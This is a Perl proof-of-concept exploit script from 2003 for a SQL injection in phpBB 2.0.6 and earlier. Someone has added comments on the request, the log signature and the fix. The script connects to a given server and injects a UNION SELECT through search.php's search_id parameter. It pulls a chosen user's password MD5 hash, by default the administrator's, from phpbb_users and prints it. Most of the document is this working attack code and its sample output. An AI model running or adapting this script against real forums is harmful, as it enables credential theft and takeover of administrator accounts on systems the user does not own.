
#!/usr/bin/perl -w
# Historical (2003) proof-of-concept for a SQL injection in phpBB <= 2.0.6,
# search.php, parameter search_id. The comments below describe what the script
# sends and what a defender can look for; the code itself is left as found.
# NOTE: the script does not `use strict`, so every variable is a package global
# and nothing is declared with `my`.
use IO::Socket;
##    PROOF-OF-CONCEPT
##    * work only with mysql ver > 4.0
##    * work only with post #1 
##
##    Example:
##    C:\>r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2
##    [~] prepare to connect...
##    [+] connected
##    [~] prepare to send data...
##    [+] OK
##    [~] wait for response...
##    [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99
##
# Usage banner: exit with status 1 unless four positional arguments were given.
if (@ARGV < 4)
{
print "\n\n";
print "|****************************************************************|\n";
print " r57phpbb.pl\n";
print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n";
print " coded by f3sy1 & 1dt.w0lf // 16/12/2003\n";
print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n";
print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n";
print " [~] <server> - server ip\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 default for phpBB admin)\n";
print " [~] <search_id> - play with this value for results\n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}
# $success becomes 1 only when a response line contains ";highlight=" (see the
# read loop below); otherwise the closing message reports failure.
$success = 0;
# The four arguments are used verbatim in the request; nothing is validated.
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
$search_id = $ARGV[3];
print "[~] prepare to connect...\n";
# Raw TCP connection to port 80; HTTP/1.0 is spoken by hand below.
# On failure the die message interpolates $socket, which is still undef at that
# point, so the output reads " error <reason>" rather than naming the socket.
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";
# PROOF-OF-CONCEPT request.
# search_id is followed by a UNION SELECT whose char(...) byte lists decode to
# a serialized PHP array (a:7:{s:14:"search_results";...}) in which the
# split_search element is built from user_password; the trailing /* comments
# out the remainder of the original query. The regex on the response below
# suggests phpBB echoes the split_search terms back in a "highlight=" URL
# parameter, which is presumably how the hash surfaces. The request is
# HTTP/1.0 with no Host header; the string literal spans several lines, so the
# embedded newlines are sent as-is.
# Defender's view: the root cause is an unvalidated search_id interpolated
# into SQL; casting it to an integer or using a parameterised query closes it.
# In access logs the request appears as search.php?search_id=<n>%20union%20select
# followed by long char( sequences and a trailing /*.
print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%20concat
(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,
116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,
97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,
105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34)
,user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,
59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,
59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,
58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,
104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=$user_id/*
HTTP/1.0\r\n\r\n";
print "[+] OK\n";
print "[~] wait for response...\n";
# Read the response line by line; every line containing ";highlight=" counts as
# a hit, so several lines may be printed. The socket is never explicitly closed.
while ($answer = <$socket>)
{
if ($answer =~ /;highlight=/)
{
$success = 1;
# Split the line on ';' and keep the second field (the "highlight=<value>"
# part), then split that on '=' to isolate the value. The s/&/ /g suggests the
# value arrives with '&' separators that are turned into spaces for display.
@result=split(/;/,$answer);
@result2=split(/=/,$result[1]);
$result2[1]=~s/&/ /g;
print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n";
}
}
if ($success==0) {print "[-] exploit failed =(\n";}
## o---[ RusH security team | www.rsteam.ru | 2003 ]---o